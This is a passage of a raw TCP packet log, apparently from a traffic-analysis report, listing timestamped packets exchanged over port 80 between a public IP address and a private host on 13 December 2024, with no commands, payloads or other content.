                                                                                                                                                                                                Dec 13, 2024 08:18:50.953908920 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.953922987 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.953937054 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.953949928 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.953963995 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.953978062 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.953990936 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.954000950 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.954004049 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.954020023 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.954035997 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:50.954049110 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.954049110 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:50.954098940 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.049455881 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.049477100 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.049659967 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.049988985 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.050096989 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.050198078 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.051307917 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.051352978 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.051448107 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.066565990 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.066590071 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.066821098 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.067255974 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.067395926 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.067507982 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.068362951 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.068789959 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.068886995 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.068958998 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.069941998 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.070081949 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.070089102 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.071152925 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.071227074 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.071289062 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.072384119 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.072458982 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.072458982 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.073554993 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.073633909 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.073638916 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.074817896 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.074891090 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.074940920 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.075984001 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.076056957 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.076083899 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.077192068 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.077275038 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.077301025 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.078397989 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.078494072 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.078505993 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.079579115 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.079660892 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.079689980 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.080801964 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.080883026 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.080897093 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.082017899 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.082088947 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.082140923 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.083256006 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.083334923 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.083348989 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.084439993 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.084522963 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.084542990 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.085608006 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.085700035 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.085701942 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.086827040 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.086904049 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.086922884 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.088021040 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.088090897 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.088128090 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.089220047 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.089286089 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.089323044 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.090418100 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.090507984 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.090526104 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.091626883 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.091718912 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.091754913 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.092860937 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.092946053 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.092957020 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.094036102 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.094135046 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.094139099 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.095252037 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.095309973 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.095354080 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.096510887 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.096558094 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.096591949 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.097644091 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.097728014 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.097774982 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.098850965 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.098942041 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.098951101 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.100060940 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.100140095 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.100181103 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.101270914 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.101352930 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.101388931 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.102454901 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.102533102 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.102618933 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.103842974 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.103899956 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.103908062 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.104891062 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.104969025 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.104999065 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.106111050 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.106213093 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.106215954 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.107264996 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.107331038 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.107387066 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.108553886 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.108634949 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.108640909 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.109697104 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.109776020 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.109805107 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.110877991 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.111004114 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.111013889 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.112081051 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.112157106 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.112210989 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.113323927 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.113416910 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.113446951 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.114537954 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.114605904 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.114624023 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.115727901 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.115798950 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.115812063 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.116915941 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.117017984 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.117019892 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.118107080 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.118190050 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.118227959 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.119364023 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.119425058 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.119448900 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.120507002 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.120601892 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.120636940 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.121774912 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.121855021 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.121881962 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.122916937 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.122986078 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.123022079 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.124164104 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.124244928 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.124257088 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.125353098 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.125430107 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.125499964 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.126539946 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.126621008 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.126657963 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.127731085 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.127790928 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.127844095 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.128945112 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.129039049 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.129056931 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.183820963 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.258533955 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.258747101 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.258877993 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.259108067 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.259195089 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.259322882 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.260313034 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.260381937 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.260566950 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.261581898 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.261600971 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.261763096 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.262706041 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.262820005 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.262978077 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.263900042 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.263994932 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.264126062 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.265069008 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.265186071 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.265341997 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.266340017 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.266437054 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.266532898 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.267534971 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.267604113 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.267723083 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.268830061 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.268842936 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.268970013 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.269864082 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.269970894 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.270085096 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.271065950 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.271186113 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.271300077 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.272315979 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.272444963 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.272548914 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.273489952 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.273623943 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.273757935 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.274662018 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.274760008 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.274867058 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.275845051 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.275934935 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.276048899 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.277036905 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.277141094 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.277271032 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.278256893 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.278374910 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.278479099 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.279474020 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.279620886 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.279737949 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.280606031 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.280715942 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.280852079 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.281786919 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.281872988 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.281974077 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.283030987 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.283118963 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.283220053 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.284368992 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.284382105 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.284509897 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.285386086 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.285484076 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.285581112 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.286585093 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.286684990 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.286849022 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.287847042 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.287935019 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.288068056 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.288978100 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.289103031 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.289207935 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.290255070 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.290359974 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.290453911 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.291384935 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.291490078 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.291595936 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.292599916 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.292638063 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.292743921 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.293747902 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.293848038 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.294019938 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.294958115 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.295026064 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.295182943 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.296129942 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.296222925 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.296314955 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.297373056 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.297420979 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.297512054 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:51.298535109 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:51.298644066 CET8049726185.81.68.147192.168.2.11
